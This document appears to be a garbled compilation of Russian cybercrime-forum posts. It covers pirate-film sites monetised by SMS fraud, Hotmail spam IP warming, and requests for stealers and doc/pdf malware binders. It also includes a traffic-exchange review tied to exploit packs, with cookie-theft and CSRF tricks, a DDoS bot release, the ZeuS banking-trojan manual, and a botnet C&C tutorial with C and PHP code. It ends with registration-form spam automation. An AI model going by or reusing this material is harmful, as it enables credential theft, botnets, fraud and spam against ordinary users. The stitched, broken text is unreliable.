Я советую брать фильмы, у которых рейтинг ожиданий больше 3000 тыс.
И так, выбрали фильм. Например «Три богатыря на дальних берегах». Идем на
http://wordstat.yandex.ru/ и
вбиваем наш запрос с точным вхождением:
"!три !богатыря !на !дальних !берегах"
По точной фразе "!три !богатыря !н... — 11800 показов в месяц. Неплохо,
правда? Если мы делаем сайты под премьеры, значит наши основные ключи:
"Название фильма" "Название фильма" онлайн "Название фильма" смотреть онлайн
"Название фильма" скачать "Название фильма" скачать торрент
Именно по таким запросам я и продвигаю свои одностраничники!
Так вот, после того, как вы выбрали фильм – вы должны ОБЯЗАТЕЛЬНО проверить
ключевые фразы на частотность, ведь не всегда фильм с 'Громким' названием
может быть ожидаемым.
И ак, мы видим, что мультфильм «Три богатыря на дальних берегах» принесет
много трафа, который мы конвертируем с помощью смс.
Важно!!! Выбираем фильмы, у которых частотность запроса более 3000-5000 тыс.
Важно!!! Новичкам советую делать и продвигать одностраничник ЗА МЕСЯЦ до
премьеры. Опытные выведут в топ за 1-2 недели.
Важно!!! Не советую брать русские фильмы. Могут быть проблемы с авторскими
правами.
3. Выбор доменного имени. Хостинг.
Для нас идеально подходят домены РФ и RU. Регистрировать домены рекомендую на
2domains.ru. Я предпочитаю свежерегнутые рф домены.
Домен обязательно должен быть с ключом.
Домен должен быть как можно короче и красивее. Например: аватар-онлайн.рф ||
avatar-smotret-online.ru
Чем меньше "-" в домене – тем лучше. Идеально одно или два тире. В основном
доменное имя для кино-одностраничника выглядит так: "название фильма" +
смотреть-онлайн "название фильма" + онлайн "название фильма" + 2012 / 2013
(то есть год выхода фильма)
По поводу хостинга – тут никаких хитростей, используйте тот, который нравится.
Никаких дополнительных настроек не нужно. Подойдут даже простые тарифы.
4. Создание одностраничника под премьеру (прокладка).
Подходим к созданию сайта под наш фильм-премьеру. Что вам сказать?.. Начнем по
порядку. Вы можете делать сайты на html+css или на cms Joomla, WordPress,
Кандидат. Вообще выбор велик. Лично я делаю на голом html + css. Это очень
удобно, к тому же все быстро загружается, а cms всегда грузят хостинг. Но
решать вам на чем проще – на том и делайте.
Рассмотрим вариант прокладки на html. У меня в арсенале 3 готовых шаблона
(прокладки), которые я использую для своих одностраничников. Я покажу пару
вариантов где их взять.
Идем в google.ru и ищем популярный фильм.
Находим сайт, например: Сумерки-рассвет2-онлайн.рф
Смотрим как устроен. Нравится – копируем! Я рекомендую копировать сайт в
браузере Mozilla Firefox. Для этого нам нужно скачать дополнение ScrapBook
1.1.5:
Идем на офф сайт
https://addons.mozilla.org/ и
находим дополнение ScrapBook 1.1.5.
У меня установлена версия 1.1.5. После установки заходим на сайт, откуда будем
копировать прокладку.
Кликаем правой кнопкой мыши – сохранить как – корневой каталог.
Внизу браузера ScrapBook показывает нам, где сохранился сайт:
Кликаем и мы переходим на наш скопированный сайт. В адресной строке смотрим
путь, где лежат файлы.
Копируем код и вставляем в то место в нашем шаблоне, где будет отображаться
плеер.
В коде только нужно заменить название фильма и настроить ширину и высоту
плеера. Названия фильма можете смотреть на платнике websharks.ru -
http://filmoteko.ru/
Вернемся к настройкам плеера. Я рекомендую ставить цену на смс в 3 доллара,
иногда ставлю по 5$. Обязательно включайте блок комментов – они повышают
конверт.
По прокладке вроде все. Можете самостоятельно добавлять страницы: Актеры,
Постеры, Скачать и т.д.
Шаблон расположения элементов на странице прокладки:
Наполнение сайта
И так. Шаблон готов. Теперь переходим к заполнению и оптимизации.
1 блок текста. Как видим выше, сначала идет '' Название фильма'' + ''смотреть
онлайн'' / ''онлайн'' / ''смотреть онлайн в хорошем качестве''. Заголовок
помещаем в тег
Вот это основные критерии отбора. Согласен, много) Ну потом будете
автоматически на глаз проверять. Я фильтрую доноров плагином ВИНКА для Firefox
браузера. Отличный плагин – рекомендую! Вот он -
https://addons.mozilla.org/ru/firefox/addon/webmaster..
В итоге на продвижение одного сайта у вас должно уходить 400-800 руб. Бюджет
зависит от конкурентности. На сумерках доходило и до 70$. Но это редкий
случай.
Есть такое понятие, как «Ускорение индексации купленных ссылок»
Это делается следующем образом: Каждую страницу с купленной ссылкой можно
прогнать по соц закладкам с помощью сервиса Бпостер. Я регулярно делаю прогоны
на новых доноров.
Сервис letusindex.com Отличный Сервис!!! Рекомендую! Почитайте ПОМОЩЬ –
разберетесь, там все просто. Загружаете список доноров и сервис сам отправляет
на пинг.
Кстати, говорят, отличная штука «Пинговалка». Оооочень простая в
использовании. Я Пингую доноров, уходит 1 минута на все.
Ну и если не лень – доноров размещайте в google+. Так же для каждого донора
можно постить 1-3 твитта. Разместите на вашем одностраничнике кнопки
Соц.Сервисов.
ВАЖНО!!! Если ваши купленные ссылки индексируются в течении нескольких дней –
смело заносите их в список избранных! Через некоторое время у вас появиться
Большой список избранных доноров и вам будет проще. Ведь вы сэкономите массу
времени и денег.
Удачи!
Схема №4
Суть.
6 WORLD OF TANKS ( Бесплатные бонус коды, читы на невидимость, бесплатная
голда)
Схему можно доработать или переработать воспользовавшись своим мозгом.
Источник: ***************
Hotmail в Inbox, прогрев IP, получение правильного заголовка письма
Информация в статье не новая, но еще работает.
Наверно, каждый кто занимается e-mail маркетингом слышал о прогреве IP-адреса, но большинство не знают, как это сделать. Хочу поделиться информацией как это сделать прогреть IP-адрес и получить к заголовоку J++ Hotmail для отправки писем в "inbox".
В чем преимущества прогрева ip-адреса?
Чем меньше IP нарушает правила, тем он больше зарабатывает себе траст-доверия.
Поговорим о том, как разогреть IP-адрес, чтобы сделать отправку в inbox
почтового сервера Hotmail.
Разве возможно это? Спросите Вы, конечно и ответ-Да, когда вы разогреете
свой IP-адрес, вы получите заголовок J++.
Что такое заголовок J++?
Если у вас есть учетная запись электронной почты hotmail, перейдите к любому
сообщению в папке "Входящие", нажмите правой кнопкой мыши и выберите,
посмотреть исходный код;
проверьте первую строку X-Store-Info, вы увидите шестнадцатеричный код,
который начинается с J++.
Не нашли код? Lol))
Такой код можно получить только если письмо отправляется с "прогретых IP"
Смысл этого кода "J++" в том, что у отправителя есть прогретый IP адрес, есть
много традиционных и нетрадиционных способов улучшить доставку входящих
сообщений в inbox и не только hotmail, один из основных способов — это
получение доверия к IP.
Как прогревать IP:
Нужно получить IP адреса поставить в связку как пример скрипт "PowerMTA" или
использовать скрытые сервисы, к которым изначально Microsoft относится с
"любовью":
Aweber
MailChimp
GetResponse
По моему собственному опыту, 15 дней достаточно, чтобы увидеть в заголовке
строку X-Store-Info равным J++, но помните, что ваши подписчики должны
реагировать на ваши сообщения каждый раз, когда вы отправляете, например,
новости или тренд. Реагировать - это ходить по ссылкам с веба или с аутлука.
Как я могу понять, что я все делаю правильно?
Есть еще один важный элемент заголовка, на который надо посматривать
“X-Message-Delivery”. Если этот заголовок равен шестнадцатеричным кодовым
числам, а два последних числа если “0w", то вы двигаетесь в правильном
направлении.
Вот пример прогретого IP-адреса :
Важно: ваши "фейковые подписчики" будут получать ваши письма в папку "Спам",
но они, то есть вы должны добавить эти письма в белый список именно в него все
будущие письма должны ложиться папку "Inbox".
Алгоритмы Hotmail видят, что ваши письмам доверяют ваши подписчики, и
большинство ваших сообщений не считаются спамом, через некоторое время пример
15 дней и вы получите трастовую отметку “X-Store-Info:J++“.
Советы:
Inbox Hotmail с 25 IP будет приносить вам $1000 займет ваше время всего 5 минут в день.
Click to expand...
Метод прогрева IP часто используют компании, которые занимаются сервисами
массовых рассылок.
Еще должно быть правильно настроено:
PTR, SPF, DKIM.
чтобы проверить правильность настройки SPF, Проверьте заголовок
"Authentication-results" в исходном коде тестового сообщения электронной
почты. он должен быть помечен как spf=pass
Примечание: это пример заголовка DKIM Linkedin.com тема рассылки: ежедневные
информационные бюллетени.
Вывод: Microsoft постоянно совершенствует почтовые программы и фильтры, могут появиться не соответствия со статьей. Не бойтесь экспериментировать.
автор: Loko
Привет всем, есть отличный биз траф снг , может кто подскажет куда двигаться
куда пристроить его лучше чтоб корова приносила плоды?
малварь и все что с этим связанно не интересно. было бы супер найти какую то
партнерку где иметь небольшой профит с этого трафа.
всем спасибо за внимание , думаю найдется кто знает толк в этом
Поднять сам сайт не самое сложное, но как сделать так чтобы нарки находили этот сайт? Вариант со спамом на почту, как я понимаю, отлетает сразу. В общем интересуют все варианты, платные и бесплатные, если платные то, конечно, желательно с минимальными затратами)
Помогите советом о том , как добыть максимум загрузок с pinapfile(файлообменник) т т.п . Любым способом , главное , что бы падал кэш с загрузок , желательно запад ! Буду очень рад любому совету . Одним ютубом и форумами распространяться достало !
нужно получить логи-пароль и hvnc доступ к машине зараженного. в идеале через
doc/pdf склейку через письмо.
какой стиллер или бот лучше взять для этого и есть ли сервисы по склейке
такие?
здравствуйте , хочу научиться спамить, фоудить или ддосить есть у кого нибуть
софт или подобное ?
имею вдс сервер .
(Подойдет самый говяный лиж бы работал , ну или ссылку где объясняют)
Нужно зафлудить одного чела смс-ками, юзал много прог но все они не пашут,
если кто знает подскажите рабочую прогу для этого, и есть ли ваще ща такие,
естественно на фри основаниях!
Ну и было бы ваще прекрасно если кто нить подсказал как убить у него телефон
samsung x670 - это было бы ваще прекрасно!
Всем п/т кто не читает новости[тыц](https://securityaffairs.co/wordpress/77442/hacking/weaponized- microsoft-office-documents.html).
**
**
**dont work in office 2007 for old
version
**
**
**
p.s Автор не я просто спиздил как всегда в наглую и тестил сегодня в office
2016 код думаю Вы так поняли где взять
побаловаться
редактируем
Итак, наша история началась со стука в жабер. Доброе и приветливое тело
представилось как Qpi,
и попросило написать обзор на биржу траффика http://vdele.cc, автором
которой он и является.
Разглядывать скриншоты кнопок никому не интересно, поэтому по ходу статьи буду
раскладывать всякие интересности
Во-первых, это биржа. Сами назначаете цену, сами выбираете почем покупать.
Баланс списывается по мере слива, за каждого уника, и всегда можно остановить
компанию, если трафф не нравится.
Регистрация через жабер, вместо мыла (слава богу, наконец) и в эту же жабу
приходят уведомления о статусе компаний продажи\покупки. Удобно.
Фронтенд-сервер во франции (не знаю, чем обусловлен выбор).
Сервера для слива трафа в Германии, в хетзнере (обещанные белые ипы)
Вбили жабу, через 30 сек подтвердились, и мы внутри.
Трафф есть, его много, все кипит
На все потоки есть возможность оставить\посмотреть отзывы. Негативные отзывы
есть, т.к. встречаются желающие сливать отжатый трафф.
Пополняемся с вм, создаем компанию покупки:
Не забываем исключить потоки с плохими отзывами.
Линк на слив (на наш пак) чекается в ghostbusters каждые 15 минут. Если он
палится 3мя ав-сервисами или гугл-сейф-броузинг, то компания останавливается.
Это жизненно важно для продавцов, чтобы не горели их фремы. Так же компания
остановится если не удастся получить линк с апи-урла несколько раз.
Если вы засранец, и хотите лить на грязный линк с паленым js-криптом -
сливайте через чистую прокладку. Так нехорошо делать, и через пару часов вас
забанят, но жизнь траферу вы подпортить успеете)
Трафф начал литься сразу, однако задержки на обновление статы до 5ти минут
(синхронизация, из-за нее замечал 5-10ти секундные подлагивания панели статы
ночами)
Стата ав-чекера:
Подробная стата по слитому трафу:
Видно что из-за задержек на синхронизацию, нам слили лишних 5 уников)
И проскочил "Win Phone 7 OS" (уже пофикшено).
Стата по сакуре:
Долетело до пака только ~910 (еще 60 со скрина слизали мои кривые руки,
промазав кнопкой обнуления).
Где 9%? Или сбежали, неуспев засчитаться (если трафф был с поп-апов), или не
дошли из-за периодически палящегося домена.
В любом случае, 9% - более чем терпимые потери на фильтре.
Самая главная фича, без которой жизнь биржи была бы невозможна - линк для
возврата непроданного трафа. Его наличие дает нам возможность проливать свой
трафф через биржу "насквозь", осаждая на ней востребованный трафф.
Когда мы создаем свою компанию, она становится на холд, и до ручного одобрения
с проверкой пробива, продать мы ничего не сможем.
20 минут, проверка пройдена, можно лить.
Каждый трафер желает знать, куда он льет трафф.
Трафик принимается не весь, только вин и макось. Также отсеивается гуглхром. На гейте приема стоят проверки на вкл/выкл кукисов, яваскрипта, картинок, отсеиваются поисковые боты, и траф у которого ширина экрана равна высоте экрана.
Click to expand...
Я так и не понял необходимости проверок включенных рисунков и совпадения ширины\высоты экрана.
Вот и сами проверки
Code:Copy to clipboard
var tdata={
p:'наш_уникальный_ид',
nc:!window.navigator.cookieEnabled?true:false,
ic:/*@cc_on ! @*/ false,
sw:screen.width,
sh:screen.height,
sd:screen.colorDepth,
np:false // для картинки резерв переменной
};
Ничего замысловатого.
Поисковые боты режутся по UA, какая либо хитрая эвристика для них отсутствует.
Правилами запрещено ставить на прокладки фрейм-бёрстеры и алерт-боксы. Тоесть,
ничего не мешает, кроме бана акаунта с холдом всех средств, и заведением блека
на жабер.
Это значит что можно покупать ифрейм-трафф, а продавать уже как "директ-
трафф", и иметь навар на воздухе.
Но даже если баер честный, то вы всеравно не застрахованы от палева ваших
фреймов идиотом-связочником:
На скрине результат слива на Нуклир. Привет автору.
Сейчас прямую выдачу сплойтов без проверок запретили в правилах. Но это не
отменяет необходимости иногда смотреть куда льется ваш трафф.
Продавцу оплачивается каждый купленый уник. Что меня смутило - в стате
выводятся хиты, а не уники. По-этому не надо пугаться "низкого КПД".
И очень порадовала подробная стата по трафу, с причинами "отказа" для каждого
уника.
Холд на заработанные деньги - 2 дня. Он введен для компенсации возможных
притензий на качество трафа.
В списке предлагаемых селерами потоков можно смореть чистоту каждого
http://vdele.cc/?do=traff&mod=orders и
там видно линк, куда будет слит трафф.
Кроме сутры и разных паков, нашлись пара дырявых wp-блогов. Залился, дописал
свои фреймы, благодарен баерам за трафф
Очень хочу, чтобы часть имени домена в чекере заменялась на *** при выводе.
Ведь баеры не хотят палить свои прокладки.
Code:Copy to clipboard
http://**rects006.ru/tds/in.cgi?12
http://**ftmostfilecopy.info/links/lacked_languages.php
http://**gleberg.se/index-filer/z.html
http://www.**rs-sex.org:777/index.php?b9f7b33f9210ecc509420555a4d306c3
...
А если трафф хочется ну совсем бесплатно, то надо стать админом.
Идем на файловый хостинг, пробуем что-нибдудь залить.
Code:Copy to clipboard
http://vdele.cc/?do=fhosting&action=upload&ajax=1&save=1&qqfile=имя_файла_не_фильтруется
А между тем, файлы доступны не только через files.vdele.cc но и через
vdele.cc/files/
и скрины статы трафа общепринято заливать как раз на местный файл-хост.
А значит привет куки проверяющего заявку на поток
Багу пофиксили оперативно, похвалили, дали пирожок с полки.
А если трафф не нужен, а нужны деньги?
Идем к форме вывода средств
http://vdele.cc/?do=profile&mod=transactions
Code:Copy to clipboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
method=wm&amount=5.00&account=Zнаш_кош&autoPayment=1&ajax=1&
Видим что для перевода денег юзеру нужно только отправить заранее известные
данные и свой (ну или наш) кош.
Тоесть ничего не мешает подсунуть вместо скрина статы, форму с автосабмитом, и
лишить беднягу его баланса.
Баг пофиксили сразу, пирожок не дали, чтоб не растолстел.
Qpi сделал отличное место чтобы продать трафф, если баеры "ждут панча",
"связку чистят", "сервера настраивают", "вот сейчас уже настрою, точно, завтра
все будет".
Не скажу что нашел какие-то уникально-интересные фичи, но все работает именно
так как и должно, как часы.
Из пожеланий:
Ребят, сделайте рейтинг с отзывами не потокам, а селлерам и баерам (ввиду
возможной недобросовестности оных). Невероятно пригодится.
п.с. Ввиду некоторого рекламного харрактера обзора, не знаю в каком разделе его разместить =\ перенесите на свой вкус. Спасибо.
N0ise DDOS Bot
ДДОС бот написанный на С с использованием технологий .Net
Бот работает в веб админкой
Умеет ддосить: http(s), syn. upd, icmp
Стелсит ФФ+Windows Key
downloader
killbot
Кажется всё....
[Stat]
[Bots]
[Tasks]
На работоспособность тестил... боты стучат, но слабо из за необходимости
использовать .net framework 3.5
Spoiler: 50
passwdjBpc2VfZGRvc2JvdCtzb3JjZS5yYXI=
DownLoad
url1
Админка и дамп в архиве
Руководство пользователя ZeuS (ЧЕРНОВИК)
==============
= Содержание =1. Описание и возможности.
2. Настройка сервера.
2.1. HTTP-сервер.
2.2. Интерпретатор PHP.
2.3. MySQL-сервер.
3. Настройка бота.
4. История версий.
5. TODO.
6. F.A.Q.
7. Мифы.==============================
= 1. Описание и возможности. =ZeuS - программное обеспечение для кражи личных данных пользователей с удаленных систем Windows. На
простом языке "Троян", "Бэкдор", "Вирус". Но автор не любит эти слова, поэтому далее в документации
он будет называть это программное обеспечение "Бот".Бот полностью основан на перехвате WinAPI в UserMode (Ring3), это значит, что бот не использует
каких-либо драйверов и обращений в Ring0. Эта особенность дает возможность запускаться боту даже из
Гостевых учетных записей Windows. Плюс это гарантирует повышенную стабильность, и адаптивность
к последующим версиям Windows.Бот разрабатывается на Visual C++ версии 9.0+, при этом не используются дополнительные библиотеки
типа msvcrt, ATL, MFC, QT и т.д. Код бота пишется со следующими приоритетами (в порядке уменьшения):
1. стабильность (старательно проверяются все результаты вызова функций и т.д.),
2. размер (избегаются повторы алгоритмов, повторы вызовов функций и т.д.),
3. скорость (нет инструкций типа while(1){..}, for(int i = 0; i < strlen(str); i++){..}).Функции и особенности бота:
1. Снифер трафика для протокола TCP.
1.1. Перехват FTP логинов на любом порту.
1.2. Перехват POP3 логинов на любом порту.
1.3. Перехват любых данных из трафика (персональный заказ).2. Перехват HTTP/HTTPS запросов для wininet.dll, т.е. всех программ работающих с этой
библиотекой. Сюда входят Internet Explorer (любая версия), Maxton, и т.д.
2.1. Подмена ..3. Функции сервера.
3.1 Socks4/4a/5.
3.2 Бэкконект для любого сервиса(RDP, Socks, FTP, и.т.д.) на зараженной машине. Вы можете
получить доступ к компьютеру, который находится за NAT, или, например, к которому
запрещены подключения из интернета.
3.3 Получение скриншота экрана в реальном времени.=========================
= 2. Настройка сервера. =Сервер является центральной точкой для управления ботнетом, он занимается сборкой отчетов ботов,
и отдачей команд ботам. Крайне не рекомендуется использовать "Виртуальный Хостинг или VDS", т.к. при
увеличение ботнета, нагрузка на сервер будет увеличиваться, и такой вид хостинга исчерпает довольно
быстро свои ресурсы. Вам нужен "Выделенный сервер" (Дедик), рекомендуемая минимальная конфигурация:
1. 2Гб ОЗУ.
2. 2x процессор частотой 2Ггц,
3. SATA винчестер 7200rpm+Для работы бота необходим HTTP-сервер с подключенным PHP + Zend Optimizer, и MySQL-сервер.
2.1 HTTP-сервер.
В качестве HTTP-сервера рекомендуется использовать: для nix-систем Apache версии 2.2+, для
Windows-систем IIS версии 6+. Рекомендуется держать HTTP-сервер на 80 или 443 порту (это
положительно влияет на отстук бота, поскольку провайдеры/прокси могут блокировать доступ на иные,
нестандартные, порты).======================
= 2. История версий. =Условные метки:
[*] - изменение.
[ - ] - исправление.
[ + ] - добавление.[Версия 1.2.0.0, 20.12.2008]
Общее:
[] Более не будет документации в chm-файле, все будет писаться в этот файл.
[ + ] Теперь бот способен получать команды не только при отправки статуса, но и при отправки
файлов/логов.
[ + ] Локальные данные, запросы к серверу, и файл конфигурации шифруются RC4 с ключом на
ваш выбор.
[] Полностью обновлен протокол бот <-> сервер. Возможно понизится нагрузка на сервер.459905217 (15:47:57 5/03/2009)
Бот:
[ - ] Устранена ошибка, блокирующая бота на лимитированных ученых записях Windows.
[] Написан новый PE-криптор, теперь PE-файл получается очень аккуратным и максимально
имитирует результат работы MS Linker 9.0.
[] Обновлен процесс сборки бота в билдере.
[] Оптимизировано сжатие файла конфигурации.
[] Новый формат бинарного файла конфигурации.
[] Переписан процесс сборки бинарного файла конфигурации.
[] Socks и LC теперь работают на одном порту.Панель управления:
[] Статус панели управления переведен в BETA.
[] Изменены все таблицы MySQL.
[] Начет постепенный перевод Панели Управления на UTF-8 (возможны временные проблемы с
отображением символов).
[] Обновлена геобаза.[Версия 1.2.1.0, 30.12.2008]
Бот:
[*] BOFA Answers теперь отсылается как BLT_GRABBED_HTTP (было BLT_HTTPS_REQUEST).
[ - ] Мелкая ошибка при отправке отчетов.
[ - ] Размер отчета не мог превышать ~550 символов.
[ - ] Ошибка существующая с начала существования бота: низкий таймаут для отсылки POST-запросов,
в результате чего блокировалась отсылка длинных (более ~1 Мб) отчетов на медленных
соединениях (не стабильных), как теоретическое последствие - бот вообще переставал слать
отчеты.Общее:
[ + ] В случаи записи отчета типа BLT_HTTP_REQUEST и BLT_HTTPS_REQUEST в поле SBCID_PATH_SOURCE
(в таблице будет path_source) добавляется путь URL.Панель управления:
[*] Обновлен redir.php.============
= 2. TODO. =1. Полноценная работа в Windows Vista/2008/Seven.
2. Изменение метода перехвата WinAPI.
3. Случайная генерация: имен файлов, настроек, и данных.
4. Консольный билдер.
5. x64 версия.
6. Поддержка IPv6.
7. Написание полноценной документации.
8. Сбор статистики используемого ПО (антивирусы, фаерволы и т.д.).
9. Перехват FireFox 3+.=============
= 4. F.A.Q. =Q: Когда все началось?
A: Далеким летом 2006, когда в руки попал глючный "VisualBreeze e-Banca". После этого возникло
желание написать что-то с такими же возможностями,(05:11:25 23/01/2009)
но не c такой глючностью, и с не с такими
размерами. А вообще, dev, спасибо за образецQ: Что значат цифры в версии ZeuS?
A: a.b.c.d
a - полное изменение в устройстве бота.
b - крупные изменения, которые вызывают полную или частичную несовместимость с предыдущими
версиями бота.
c - исправления ошибок, доработки, добавление возможностей.
d - номер чистки от AV для текущей версии a.b.c.Q: Каким оброзом генерируется Bot ID?
A: Bot ID состоит из двух частей: %name%_%number%, где name - имя компьютера (результат от
GetComputerName), а number - некое число, генерируемое на основе некотрых уникальных данных ОС.===========
= 5. Мифы =M: ZeuS использует DLL для своей работы.
A: Ложь. Существует только один исполняемый PE файл (exe). Dll, sys и т.д. не когда не было и
врятли когда-либо будет. Этот миф пошел в результате того, что в некоторых версия бота для
хранения настроек, используются файлы с такими расширениями.M: ZeuS использует COM (БХО) для перехвата Internet Explorer.
A: Ложь. Всегда для этого использовался перехват WinAPI из wininet.dll.Click to expand...
Итак, мы имеем ZeuS 1.2.1.6 с ломаным(в плохом смысле) инсталлером и админкой.
Один из оплотов обсуждения взгромоздился
тут.
Как оказалось наша преелесть не хочет устанавливаться и вешается в цикл.
Сама прелесть.
Pass: xss.is/
Есть какие нибудь мысли, господа? 8)
PS
Серьезных людей, которые имеют стойкое негативное отношение к продукту я
понимаю, и прошу если и критиковать, то со ссылкой на альтернативу.
Собственно вот и косяки, со слов KramerJohn:
Вообщем сейчас вот что мы имеем для статы 1.2.*
- попорченый install - ставим вручную (немножко моска - и все получится);
- рабочая статистика - в нее можно нормально залогинится(в файле in.php намерено спутаны некоторые переменные);
- работают все модули - в некоторых были попорчены исходники, стояли; непонятные циклы запросов в базу.;
- не корректно работает s.php - боты не добавляются в стату.
Над чем сейчас я собственно и работаю.И все заявление любых аффтаров что у них все зашибись - ложь и фейк.
Рабочей админки 1.2.* нету.Click to expand...
Кстати для людей хотя бы чуть чуть умеющих кодить на пхп это вариант заработка, не совсем правда красивый.
Анализировал сетевую активность - пришел к выводу, что кое-кто в сети запустил
ботнет клиента..
можно ли угнать ботнет, если связь идет через https?
Spoiler: 3 у вас 43
распокавал аригинальную админку в /var/www/dream/
Затем заменил файлы на аминку от Одинкого Волка
Создал базу
Проставил chmod
Проинсталировал админка ругалась на GeoIP.dat нашел сей файл, залил все
заработало проверил
http://192.168.0.4/dream/ - adminka
затем в билдере указал
host 192.168.0.4
path /dream/knock.php
time 1
зделал бота отключил на одной из машин в этой сети антиваирус и запустил
отстука нет (((
на странице статистики ошибки
Code:Copy to clipboard
Warning: Division by zero in /var/www/dream/functions.php on line 1480
Warning: Division by zero in /var/www/dream/functions.php on line 1480
Warning: Division by zero in /var/www/dream/functions.php on line 1481
Warning: Division by zero in /var/www/dream/functions.php on line 1481
я так понимаю это потому что нет ботов )
Боян но все же:
SMS flooder + spamer
Позволяет слать некоторое число сообщений на определённый номер или по одному
сообщению на номера из заданного списка. Для работы скрипта нужны
соответственно N-ное число аккаунтов mail.ru и хост с PHP и поддержкой функций
socket_***. Скрипт имеет удобный веб-интерфейс, использует технологию AJAX.
Этот скрипт никак не связан с теми, что сейчас продают, исходники выкладываю в
незашифрованном виде.
Пользуйтесь!
Нашёл небольшую статейку по данной теме.Тем,кто начал осваивать php и хочет написать на этом языке что то вроде админки по управленю ботами,думаю будет полезно.
Сейчас я расскажу как можно написать бота и управлять ими в последствии
раздельно из админки на php.
Такс, начнем с бота:
Он будет иметь некий функционал - спам, ддос, лоадер. Неважно. Это не самое
главное. Главное то, что он должен получать что-то из админки - адреса для
спама, ip жертвы для ддоса и т.д.
И тем более чтоб нам было удобнее уметь работать с каждым ботом в отдельности.
Это простая процедура для захода бота на сайт и получения команды по его ip(я
так сделал т.к. это проще всего, но можно передавать скрипту например id
какой-нить железки в компе и тогда будешь точно знать что боты все разные и
команду получит один бот, а не все которые имеют этот ip)
Code:Copy to clipboard
void main ()
{
char buffer;
DWORD dReadFileCount;
HINTERNET session = InternetOpen(LPCSTR("IE"), INTERNET_OPEN_TYPE_PRECONFIG, 0, 0, 0);
HINTERNET hConnect= InternetConnect(session,"botmaster.ru",INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 1);
DWORD lpThreadId;
LPCTSTR AcceptTypes[] = { TEXT("*/*"), NULL};
char hdrs[] =TEXT(
"Content-Type: application/x-www-form-urlencoded\r\n"
"Accept-Language:ru\r\n"
"Accept-Encoding:gzip, deflate");
char frmdata[] ="os";
char wer[] = {TEXT("stat/command.php)};
HINTERNET hRequest = HttpOpenRequest(hConnect, TEXT("GET"),wer,NULL,NULL,(LPCSTR *)"*/*", INTERNET_FLAG_KEEP_CONNECTION, 1);
HttpSendRequest(hRequest, hdrs, strlen(hdrs), frmdata, strlen(frmdata));
dReadFileCount = 0;
do {
InternetReadFile (hRequest, (LPVOID)buffer, FILE_BUFFER_SIZE, &dReadFileCount);
}while (dReadFileCount);
InternetCloseHandle(hRequest);
InternetCloseHandle(hConnect);
InternetCloseHandle(session);
}
После выполнения этой процедуры бот зайдет на скрипт и запишет то, что скрипт
выдаcт в buffer. С которым можно потом проводить всякие манипуляции.
Теперь напишем простенький управляющий скрипт:
МЫ будем держать все комманды и ip ботов в БД. Надо создать
таблицу stat и в ней 2 поля REMOTE_ADDR и command.
Сам скрипт добавления в БД новых ботов
Code:Copy to clipboard
<?php
include "connect.php";// думаю скрипт соединеия с БД вы напишите
$ip=getenv('REMOTE_ADDR');
$result = mysql_query("SELECT REMOTE_ADDR FROM stat");
while ($bot_ip = mysql_fetch_array ($result))
{
if ($bot_ip['REMOTE_ADDR']==$ip) // если бот с таким ip есть то ничего не делаем
{
$int=1;
}
}
if ($int<>1){ // иначе записуем его в БД
$result = mysql_query("INSERT INTO stat(REMOTE_ADDR) VALUES('$ip')");
}
mysql_close($link);
?>
Так в БД его записали. Теперь надо ему пердать команды. Это делается так:
Code:Copy to clipboard
<form action="loadexe.php" method="post">
<input type="text" name="command" value="">
IP Бота ->
<input type="text" name="ip" SIZE="20" value="">
<input type="submit" value="Дать команду">
</form>
<?
include "connect.php";
$ip = substr($HTTP_POST_VARS["ip"],0,70);
$command = substr($HTTP_POST_VARS["command"],0,64);
$res=mysql_query("UPDATE stat SET command='$command' WHERE REMOTE_ADDR=$ip");
if(!res)
{echo " mysql_error()";}
mysql_close($link);
?>
Ну чтож теперь выведем боту эти команды:
Code:Copy to clipboard
<?php
include "connect.php";
$ip=getenv("REMOTE_ADDR");
$result= mysql_query("SELECT command FROM stat WHERE REMOTE_ADDR='$ip'");
if (!$result)
{
echo mysql_error();
}
$bot=mysql_fetch_array($result);
echo $bot['loadExe'];// выводим на страничку команду боту
mysql_close($link);
?>
Ну вот и все. Это самая простая реализация.
Пишем вопросы, чекаю раз в день
Всем здрасте)
Раз уж пошла такая пьянка емейл рассылок- то почему бы и мне не внести свою
лепту)
Как искать доноров более подробно описано на этом же форуме в этой статье
Email рассылка с доноров на автопилоте я же
не буду останавливаться на данном моменте, но приложу файл с ключами по
которым выпаршиваю доноров я.
Со времени этой статьи, на которую я ссылаюсь прошло давольно много времени и
зеннопостер внес изменения которые гораздо облегчают работу с пост гет
запросами, а именно больше к примеру не нужно выпаршивать куки так как
появился CookieContainer.
Покажу на примере донора https://www.liveinternet.ru/
Для работы нам понадобится:
Зеннопостер (у меня версия про)
Сервис по разгадыванию капчи (я использую Xevil)
notepad++
прокси (я покажу на примере бесплатных соксов)
Снифать траф мы будем встроенным в зеннопостер снифером (если вам проще
фидлер, бурп и другие можете использовать их)
Тестовый ящик для проверки инбокса (использовал меилру)
И так приступим)
Сначала нужно определить какой длины крео нам разрешает донор отправить на
ящик
Переходим по ссылке регистрации на нашем доноре, в моем случае это
https://www.liveinternet.ru/journal_register.php
и заполняем все поля:
Ваш email: вводим свой тестовый ящик
Выберете пароль: сюда ставим креатив, для проверки сколько символов пропустит
ставьте любой! я же просто вставил ссылку на регистрацию
https://www.liveinternet.ru/journal_register.php
Повторите пароль: повторяем наш креатив
решаем капчу и жмем отправить
Затем переходим в нашу почту и видим, что письмо с нашим креотивом пришло в
инбокс но ссылка не целая, значит стоит ограничение по символам...
копируем наше крео из ящика в notepad++ и смотрим сколько символов можно
разместить, и под ним же сразу составляем варианты своих креативов (я покажу
на примере одного)...
Еще раз переходим на страницу регистрации нашего донора и заполняем все поля,
только на этот раз в поле пароль вставим наш подготовленный креатив! Нажимаем
отправить...
Как видим на этот раз наш креатив с сылкой пришел полностью!
Переходим к автоматизации всего процесса...
Создаем рабочую папку внутри которой создаем 4 txt файла.
У меня это:
base.tx (файл с базой на которую шлем <<в самом начале когда тестирую я просто
клонирую свою контрольку... затем уже когда шаб будет готов заменю на базу>>)
proxy.txt (файл с прокси)
links.txt (наши редики)
text.txt (наш креатив)
Запускаем Зеннопостер
Сразу зададим в шаблоне входные настройки, чтобы если нам захочется
использовать другие файлы нам не пришлось по 20 раз переписывать шаб.
Для этого нажимаем правой копкой мыши на панеле (на рисунке номер 1)
И выибраем Добавить входные настройки (на рисунке номер 2)
Затем нажимаем на кубики входных настроек и вписываем свои значения...
В поле Имя вводим понятное для нас название (у меня это Базы)
